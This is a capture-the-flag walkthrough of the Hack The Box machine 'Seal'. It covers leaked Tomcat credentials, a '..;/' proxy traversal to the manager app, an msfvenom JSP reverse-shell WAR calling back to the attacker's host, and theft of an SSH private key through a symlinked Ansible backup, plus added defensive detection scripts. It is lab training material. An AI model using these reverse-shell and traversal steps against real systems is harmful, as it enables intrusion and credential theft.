SEAL

Scanning

NMAP

➜  ~ sudo nmap -F seal.htb           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:24 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.16s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
443/tcp  open  https
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds

A fast scan first (1.16 seconds); take a look at these three ports while the full scan finishes.

➜  ~ sudo nmap -T4 -p- -A seal.htb       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:13 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.22s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 19 Aug 2021 12:23:54 GMT
|     Set-Cookie: JSESSIONID=node01frvnjr75rhdfsbmdepqve4n287.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Thu, 19 Aug 2021 12:23:52 GMT
|     Set-Cookie: JSESSIONID=node05b59i0stcc6s1ffnbtlbvqhoe85.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Thu, 19 Aug 2021 12:23:53 GMT
|     Set-Cookie: JSESSIONID=node01ru35o66qwp7pncfzoorb2jyt86.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   128.44 ms 10.10.16.1
2   228.82 ms seal.htb (10.10.10.250)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 709.02 seconds

Enumeration

Port 8080

Register and sign in.

At first look we find some usernames: root, luis, alex.

Scrolling through the news feed we find this:

Open it:

<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>

Credentials: tomcat:42MrHBf*z8{Z%

Trying to log in with it gives an error.

Trying the other users: logged in as luis with the same password, luis:42MrHBf*z8{Z%

Nothing interesting here for now.

Port 443

Directory busting

From the error page and GitBucket we know the server runs Tomcat.

➜  ~ gobuster dir -u https://seal.htb/ -w ~/SecLists/Discovery/Web-Content/tomcat.txt -k 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://seal.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/x/SecLists/Discovery/Web-Content/tomcat.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/19 09:44:14 Starting gobuster in directory enumeration mode
===============================================================
/examples/%2e%2e/manager/html (Status: 403) [Size: 162]
/examples/../manager/html (Status: 403) [Size: 162]    
/host-manager         (Status: 302) [Size: 0] [--> http://seal.htb/host-manager/]
/host-manager/html/*  (Status: 403) [Size: 162]                                  
/manager              (Status: 302) [Size: 0] [--> http://seal.htb/manager/]     
/manager/html         (Status: 403) [Size: 162]                                  
/manager/html/*       (Status: 403) [Size: 162]                                  
/manager/jmxproxy     (Status: 401) [Size: 2499]                                 
/manager/jmxproxy/*   (Status: 401) [Size: 2499]                                 
/manager/status/*     (Status: 401) [Size: 2499]                                 
/manager/status.xsd   (Status: 200) [Size: 4374]                                 
                                                                                 
===============================================================
2021/08/19 09:44:18 Finished
===============================================================

/manager/status.xsd (Status: 200) [Size: 4374]

Open it and try the credentials tomcat:42MrHBf*z8{Z%

We're in 👏

Exploit

Trying Path Traversal

You need to know this first: the reverse proxy in front matches its deny rules on the raw URL, while Tomcat strips path parameters (everything after a ; in a segment) and then resolves .., so the two see different paths for the same request.

https://seal.htb/manager/status/..;/html

Open the application manager.

We can upload files here.

Let's generate a reverse shell using msfvenom (read this first):

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.30 LPORT=9999 -f war -o rshell.war

Set up the msf listener:

➜ sudo msfdb run
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set lhost 10.10.16.30
lhost => 10.10.16.30
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.30:9999 

The upload form loses our traversal path, so let's use Burp to edit the request.

Read this page to understand what is going on under the hood.

Edit the POST request path to /manager/jmxproxy/..;/html/upload

Uploaded successfully.

Trigger it ...

We have a reverse shell.
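As an added defensive example (not part of the original write-up): a small log check that models the mismatch behind the ..;/ trick. It assumes a constructed set of nginx access-log lines and a hypothetical deny list, and flags requests the proxy let through that land on a blocked Tomcat path after Tomcat's own normalization.

```python
import re
from urllib.parse import unquote

# Constructed sample nginx access log lines (not from the original write-up).
SAMPLE_LOG = """\
10.10.16.30 - - [19/Aug/2021:09:50:01 -0400] "GET /manager/status/..;/html HTTP/1.1" 200 1234
10.10.16.30 - - [19/Aug/2021:09:50:02 -0400] "GET /manager/html HTTP/1.1" 403 162
10.10.16.30 - - [19/Aug/2021:09:51:10 -0400] "POST /manager/jmxproxy/..;/html/upload HTTP/1.1" 200 0
10.10.16.30 - - [19/Aug/2021:09:52:00 -0400] "GET /index.html HTTP/1.1" 200 5000
"""
# Prefixes the reverse proxy is meant to block (assumed, based on the 403s in the gobuster output).
DENIED_PREFIXES = ("/manager/html", "/host-manager/html")

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def tomcat_normalize(raw_path: str) -> str:
    """Simplified model of how Tomcat resolves a request path: percent-decode,
    drop ';param' from every segment, then collapse '.' and '..' segments."""
    path = unquote(raw_path.split("?", 1)[0])
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # path parameters are stripped per segment
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def proxy_sees_denied(raw_path: str) -> bool:
    """Literal prefix match, the way a plain 'location /manager/html' rule sees it."""
    return raw_path.startswith(DENIED_PREFIXES)


def find_bypasses(log_text: str) -> list:
    """Return (method, raw_path, effective_path) for requests the proxy let through
    that land on a denied path once Tomcat has normalized them."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        raw, effective = m["path"], tomcat_normalize(m["path"])
        if not proxy_sees_denied(raw) and effective.startswith(DENIED_PREFIXES):
            hits.append((m["method"], raw, effective))
    return hits
```

Running find_bypasses over the sample lines reports the two ..;/ requests and ignores the plain /manager/html hit, which the proxy already rejected.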

Privilege Escalation

What's running here? ps -aux

/bin/sh -c sleep 30 && sudo -u luis /usr/bin/ansible-playbook /opt/backups/playbook/run.yml
cat /opt/backups/playbook/run.yml
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/

Backup Script

Let's symlink /home/luis/.ssh into the dashboard directory so it gets backed up (the synchronize task runs with copy_links=yes, so the link is dereferenced):

ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

Find the archive name:

ls /opt/backups/archives/

Copy it:

cp /opt/backups/archives/backup-2021-07-13-03:00:32.gz rsa.gz

Decompress and extract:

gzip -kd rsa.gz
tar -xf rsa

Follow the path to the private key (the link was created as uploads, so that is the directory name inside the archive):

cd dashboard
cd uploads
cd .ssh
cat id_rsa

Copy it to your local machine.
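Added example, not from the original write-up or the box: a pre-archive check that a backup job like the playbook above could run before synchronize/archive. It builds a constructed, hypothetical directory tree and reports any symlink whose target resolves outside the source directory, which is exactly what copy_links=yes would otherwise follow into the archive.

```python
import os
import tempfile
from pathlib import Path


def symlinks_escaping(root: str) -> list:
    """Walk `root` without following links and return (link, resolved_target) for
    every symlink whose target resolves outside `root`. With copy_links=yes the
    synchronize task would dereference these and pull outside files into the backup."""
    root_path = Path(root).resolve()
    escapes = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            p = Path(dirpath) / name
            if not p.is_symlink():
                continue
            target = p.resolve()  # follows the whole link chain
            if target != root_path and root_path not in target.parents:
                escapes.append((str(p), str(target)))
    return escapes


def build_demo() -> tuple:
    """Construct a throwaway tree shaped like the playbook's source dir: one
    benign file, one in-tree link, and one link to a '.ssh' dir outside the tree.
    Returns (source_dir, outside_dir). Hypothetical paths, not the box's."""
    base = tempfile.mkdtemp(prefix="seal-demo-")
    outside = Path(base) / "home" / "user" / ".ssh"
    outside.mkdir(parents=True)
    (outside / "id_rsa").write_text("DEMO KEY MATERIAL (constructed)\n")
    src = Path(base) / "webapps" / "ROOT" / "admin" / "dashboard"
    src.mkdir(parents=True)
    (src / "index.html").write_text("<html></html>\n")
    os.symlink(outside, src / "uploads")                # escapes the tree
    os.symlink(src / "index.html", src / "index-link")  # stays inside: fine
    return str(src), str(outside)


if __name__ == "__main__":
    src, outside = build_demo()
    for link, target in symlinks_escaping(src):
        print(f"refuse to archive: {link} -> {target}")
```

A job that aborts when this list is non-empty (or that runs synchronize without copy_links) would not have leaked the key here.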

Root User

Check sudo rights.

Read these first:

https://www.redhat.com/en/topics/automation/what-is-an-ansible-playbook

https://www.middlewareinventory.com/blog/ansible-command-examples/

Create a playbook file with any name, e.g. "root.yml".

Run it.

-p (from the bash manual): Turned on whenever the real and effective user ids do not match. Disables processing of the $ENV file and importing of shell functions. Turning this option off causes the effective uid and gid to be set to the real uid and gid.
